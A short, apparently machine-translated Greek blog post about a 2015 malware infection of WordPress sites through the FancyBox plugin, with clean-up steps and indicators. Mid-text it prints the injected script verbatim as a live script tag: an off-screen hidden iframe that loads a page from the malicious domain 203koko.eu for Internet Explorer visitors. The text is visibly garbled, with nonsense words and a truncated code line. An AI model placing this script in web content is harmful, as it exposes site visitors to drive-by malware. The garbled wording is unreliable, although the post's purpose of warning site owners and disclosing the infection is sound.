Νωρίτερα αυτή την εβδομάδα μια σειρά από ιστοσελίδες και blogs WordPress, έλαβε προειδοποιήσεις από μολυνθεί με κακόβουλο λογισμικό μέσω Webmasters Google.
Το πρόβλημα που Webmasters Google που αναφέρονται είναι η παρουσία ενός μπακαλιαρος / γραφή iframe malware η ιστοσελίδα πηγή.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Φαίνεται ότι πρόκειται για μια τρωτό a συνδέωκεκτημένο FancyBox για WordPress που μέχρι χθες (05.02.2015) δεν είχε ενημερωθεί για μεγάλο χρονικό διάστημα.
Η επίλυση αυτού του προβλήματος και απολύμανση ιών τοποθεσίες με αυτό το κακόβουλο λογισμικό, είναι σχετικά απλή.
1. Απενεργοποιήστε την προσθήκη FancyBox.
2. Διαγράψτε όλα τα αρχεία προσθήκης FancyBox από το διακομιστή (μέσω FTP)
3. Εγκαταστήστε τη νέα έκδοση της προσθήκης (Fancybox 3.0.4)
FancyBox για WordPress 3.0.4
- Μετονόμασε τη ρύθμιση που επηρεάζεται από το ζήτημα ασφαλείας που αναφέρεται στην ενότητα 3.0.3. Αυτό θα πρέπει να σταματήσει την εμφάνιση του κακόβουλου κώδικα σε ιστότοπους όπου βρίσκεται το πρόσθετο updated χωρίς να αφαιρέσετε τον κακόβουλο κώδικα.
FancyBox για WordPress 3.0.3
- Διορθώθηκε ένα ζήτημα ασφαλείας.
Πληροφορίες κακόβουλου λογισμικού:
ΤΥΠΟΣ: Iframe ανακατεύθυνση
TARGET: WordPress fancybox
ΚΑΚΟΒΟΥΛΟ τομέα: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
ΚΑΚΟΒΟΥΛΟ ΛΟΓΙΣΜΙΚΟ RAW ΚΩΔΙΚΟΙ:
ΓΡΑΠΤΗ ΜΑΛΒΑΡΙΑ: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Καταργήστε κακόβουλο λογισμικό από το δικό σας WordPress .
